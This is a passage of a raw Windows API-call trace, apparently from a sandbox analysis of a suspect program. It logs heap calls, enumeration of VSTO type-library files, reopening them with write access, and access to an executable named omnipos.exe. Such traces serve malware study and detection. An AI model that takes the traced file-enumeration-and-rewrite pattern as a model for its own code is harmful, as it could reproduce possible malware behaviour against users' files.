Size=0x20) returned 0x88770 [0087.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.813] AreFileApisANSI () returned 1 [0087.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0087.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82208 [0087.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 66 [0087.814] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6340300, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0xd6340300, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x4298)) returned 1 [0087.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0087.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0087.814] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.814] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.814] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6340300, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0xd6340300, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x5898, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="vstoee90.tlb", cAlternateFileName="")) returned 1 [0087.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0087.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0087.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0087.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0087.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5ef58 [0087.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0087.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0087.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ef58 | out: hHeap=0x20000) returned 1 [0087.815] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.815] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.815] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.815] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0087.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.815] AreFileApisANSI () returned 1 [0087.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb", lpUsedDefaultChar=0x0) returned 65 [0087.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0087.815] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.815] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0087.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.815] AreFileApisANSI () returned 1 [0087.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0087.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82448 [0087.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x82448, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 65 [0087.815] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0087.815] GetFileType (hFile=0x41c) returned 0x1 [0087.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82448 | out: hHeap=0x20000) returned 1 [0087.816] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.816] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.816] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.816] CloseHandle (hObject=0x41c) returned 1 [0087.816] AreFileApisANSI () returned 1 [0087.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0087.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82e68 [0087.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x82e68, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 65 [0087.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0087.816] GetFileType (hFile=0x41c) returned 0x1 [0087.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82e68 | out: hHeap=0x20000) returned 1 [0087.817] CloseHandle (hObject=0x41c) returned 1 [0087.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0087.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0087.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0087.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0087.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0087.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0087.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.818] AreFileApisANSI () returned 1 [0087.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0087.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x823b8 [0087.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x823b8, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 65 [0087.818] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6340300, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0xd6340300, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x5898)) returned 1 [0087.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x823b8 | out: hHeap=0x20000) returned 1 [0087.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0087.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.818] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x80, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8a408, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x80, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓墘")) returned 0 [0087.818] FindClose (in: hFindFile=0x78250 | out: hFindFile=0x78250) returned 1 [0087.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45ef8 | out: hHeap=0x20000) returned 1 [0087.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0087.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0087.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0087.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0087.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0087.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0087.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.820] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.820] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.820] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.820] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0087.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.820] AreFileApisANSI () returned 1 [0087.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\omnipos.exe", lpUsedDefaultChar=0x0) returned 42 [0087.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0087.820] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.820] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0087.820] AreFileApisANSI () returned 1 [0087.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0087.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67600 [0087.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x67600, cchWideChar=42 | out: lpWideCharStr="C:\\Program Files\\Common Files\\omnipos.exe") returned 42 [0087.820] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\omnipos.exe" (normalized: "c:\\program files\\common files\\omnipos.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0087.820] GetFileType (hFile=0x420) returned 0x1 [0087.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67600 | out: hHeap=0x20000) returned 1 [0087.821] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.821] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.821] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.821] CloseHandle (hObject=0x420) returned 1 [0087.821] AreFileApisANSI () returned 1 [0087.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0087.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67240 [0087.821] 